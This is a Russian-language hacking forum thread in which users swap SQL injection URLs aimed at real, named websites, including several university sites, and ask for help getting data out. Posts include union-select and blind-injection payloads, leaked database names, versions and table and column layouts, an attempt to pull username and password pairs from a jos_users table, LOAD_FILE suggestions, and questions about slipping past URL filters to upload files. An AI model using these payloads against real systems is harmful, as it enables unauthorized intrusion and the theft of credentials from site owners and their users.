Помимо там описанного не забываем так же о табличке user_privileges из information_schema. SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘file’ AND grantee like ‘%username%' u36a, но в твоем случае это не прокатит т.к. версия 4.1. Заюзай вариант с LOAD_FILE, как уже было предложено
что то у меня не получается) http://studorgs.bowdoin.edu/meddies/members.php?mid=-27+or+1=1/* http://cyberbuzz.gatech.edu/ice_hockey/news.php?nid=-4+or+1=1/*&PHPSESSID=8021c6f2f9284e9566bd87b298ef8f30 http://ext.wsu.edu/pnn/user/viewNotification.php?nid=-2007-326+or+1=1-- http://studorgs.bowdoin.edu/meddies/news.php?nid=-10+or+1=1/* http://www.umass.edu/research/rld/bioportal/viewfac.php?fid=-79+or+1=1/*
http://studorgs.bowdoin.edu/meddies/members.php?mid=28+and+substring(version(),1,1)=3/* http://cyberbuzz.gatech.edu/ice_hockey/news.php?nid=5+and+substring(version(),1,1)=3/* http://studorgs.bowdoin.edu/meddies/news.php?nid=10+and+substring(version(),1,1)=3 http://www.mgv.edu/view_news.php?nid=3+union+select+1,version(),3,4--+ Когда-же ты будешь помнить про третью ветку?
Привет, Есть адрес : http://magicweb.md/news.php?id=-28+union+select+1,2,3,4,5,6,7/* DataBase() : usr_mweb2_4 Version() : 5.0.32-Debian_7etch8-log User() : mweb2@localhost Tables ### jos_users ,user Columns ### ID , group_ID , login , pass , name , email ,lastvisit , ---(это от таблицы user) | id , name , username , email , password , usertype --- (от таблицы jos_users ) Вопрос : Я когда пытаюсь писать например : magicweb.md/news.php?id=-28+union+select+1,2,3,concat(username,0x3A,passwor d)+from+jos_users/* То выскакивает ошибка. Я пытался обходить типа unhex(hex(username)) ,ili convert(username+using+latin1) ... но у меня не выходит вывести данные с таблицы . Подскажите пожалуйста что делать .
2sabe, Code: http://www.umass.edu/research/rld/bioportal/viewfac.php?fid=-79'+union+select+1,2,3,4,5,6,version(),8,9,0,11,12,13,14,15,16,17,18--+
почему так? http://www.diocesispinardelrio.net/active/verunanoticia.php?ID=46+order+by+4-- однако , http://www.diocesispinardelrio.net/active/verunanoticia.php?ID=46+union+select+1,2,3,4-- не работает... ?
вроде как инъект без вывода... http://www.diocesispinardelrio.net/active/verunanoticia.php?ID=46+and+substring(version(),1,1)=4-- есть таблица user.
всем привет ) подскажите когда я проверяю скрип на -> ' но там все нормально , но когда я подставляю большое число пишет что запись с таким номером отсутствует ошибки скуля нет вот примет id=234 нормально а подставиш id=2349999 пишет что не существует. Говорит ли это что есть уязвимость? Я вчера впервые провел пхп иньекцию прикольно))))
Угу, отсутствие страницы явно уязвимость. Из категории рутовых яваскриптов по протоколу TCP/IP, можно использовать только по вечерам четверга с 19:00 до 23:30 по местному времени.
laedafess фтп не фильттрует)) -m0rgan- какой хекс в смд? или я не понимаю при этом фильтрует "http://" а https:// не фильтрует.. но так не заливается.. наверника изза того что некому принять сертификат)) ftp:// тоже не фильтрует, фпт бес пароля fetch сможет пробить файл?) подскажите как обойти такой фильтр?
